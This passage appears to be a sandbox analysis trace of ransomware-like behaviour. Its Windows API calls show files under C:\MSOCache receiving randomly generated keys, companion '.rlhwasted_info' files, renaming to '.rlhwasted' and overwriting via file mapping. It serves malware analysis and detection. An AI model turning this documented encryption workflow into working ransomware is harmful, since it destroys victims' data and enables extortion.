pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.262] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.271] SetEndOfFile (hFile=0x104) returned 1 [0185.273] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.273] CloseHandle (hObject=0x104) returned 1 [0185.277] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0185.278] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed210 | out: hHeap=0x6b0000) returned 1 [0185.278] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0185.279] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.279] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.279] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0185.279] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b0) returned 0x70cfe8 [0185.279] lstrcpyW (in: lpString1=0x70d08e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.279] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.279] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0185.281] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.281] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.281] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.282] WriteFile (in: hFile=0x104, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.283] SetEndOfFile (hFile=0x104) returned 1 [0185.283] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.283] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.283] lstrcpyW (in: lpString1=0x70d08e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.rlhwasted")) returned 1 [0185.285] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0185.285] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0185.285] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x333 [0185.285] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0x6a0000 [0185.285] CloseHandle (hObject=0x108) returned 1 [0185.325] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0185.326] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0185.326] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.326] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0185.327] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.327] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.352] SetEndOfFile (hFile=0x104) returned 1 [0185.355] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.355] CloseHandle (hObject=0x104) returned 1 [0185.360] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0185.360] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f4df8 | out: hHeap=0x6b0000) returned 1 [0185.361] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0185.362] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.362] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.362] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0185.362] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6d4580 [0185.362] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.362] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.362] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0185.363] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.363] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.363] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.364] WriteFile (in: hFile=0x104, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.365] SetEndOfFile (hFile=0x104) returned 1 [0185.365] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.365] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.365] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0185.366] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0185.366] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0185.366] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xa40 [0185.367] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa40) returned 0x6a0000 [0185.367] CloseHandle (hObject=0x10c) returned 1 [0185.393] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0185.394] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.394] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.394] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0185.395] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.395] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.405] SetEndOfFile (hFile=0x104) returned 1 [0185.407] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.407] CloseHandle (hObject=0x104) returned 1 [0185.409] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0185.409] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0185.410] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0185.411] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.411] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.411] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0185.411] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c0) returned 0x6d4580 [0185.411] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.411] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.411] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0185.412] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.412] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.412] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.413] WriteFile (in: hFile=0x104, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.415] SetEndOfFile (hFile=0x104) returned 1 [0185.415] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.415] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.415] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.rlhwasted")) returned 1 [0185.416] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0185.416] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0185.416] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xaec3a [0185.416] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x12b0000 [0185.417] CloseHandle (hObject=0x108) returned 1 [0185.491] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0185.493] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.493] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.493] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0185.494] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.494] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.506] SetEndOfFile (hFile=0x104) returned 1 [0185.509] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0185.509] CloseHandle (hObject=0x104) returned 1 [0185.511] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0185.511] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eceb8 | out: hHeap=0x6b0000) returned 1 [0185.511] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0185.512] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.512] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.512] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0185.512] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x70d2b0 [0185.512] lstrcpyW (in: lpString1=0x70d352, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.512] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0185.512] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0185.513] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0185.513] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.514] WriteFile (in: hFile=0x104, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.515] SetEndOfFile (hFile=0x104) returned 1 [0185.515] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.515] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0185.516] lstrcpyW (in: lpString1=0x70d352, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.rlhwasted")) returned 1 [0185.536] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0185.536] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0185.537] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x41d4 [0185.537] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41d4) returned 0xb00000 [0185.537] CloseHandle (hObject=0x128) returned 1 [0185.569] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0185.570] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.570] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.570] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0185.571] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.571] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.580] SetEndOfFile (hFile=0x104) returned 1 [0185.582] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.582] CloseHandle (hObject=0x104) returned 1 [0185.585] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70d2b0 | out: hHeap=0x6b0000) returned 1 [0185.585] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed328 | out: hHeap=0x6b0000) returned 1 [0185.585] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0185.586] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0185.586] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.586] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0185.586] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c0) returned 0x6d4580 [0185.586] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.586] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.586] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0185.587] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.587] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.587] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.588] WriteFile (in: hFile=0x104, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0185.589] SetEndOfFile (hFile=0x104) returned 1 [0185.589] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.590] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.590] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.rlhwasted")) returned 1 [0185.591] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0185.591] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0185.591] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xaec3a [0185.591] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x12b0000 [0185.591] CloseHandle (hObject=0x108) returned 1 [0185.621] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0185.622] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6ed220 | out: pbBuffer=0x6ed220) returned 1 [0185.622] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.622] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0185.623] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0185.623] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.632] SetEndOfFile (hFile=0x104) returned 1 [0185.664] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.664] CloseHandle (hObject=0x104) returned 1 [0185.667] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0185.667] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecfc8 | out: hHeap=0x6b0000) returned 1 [0185.667] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0185.668] CryptGenRandom 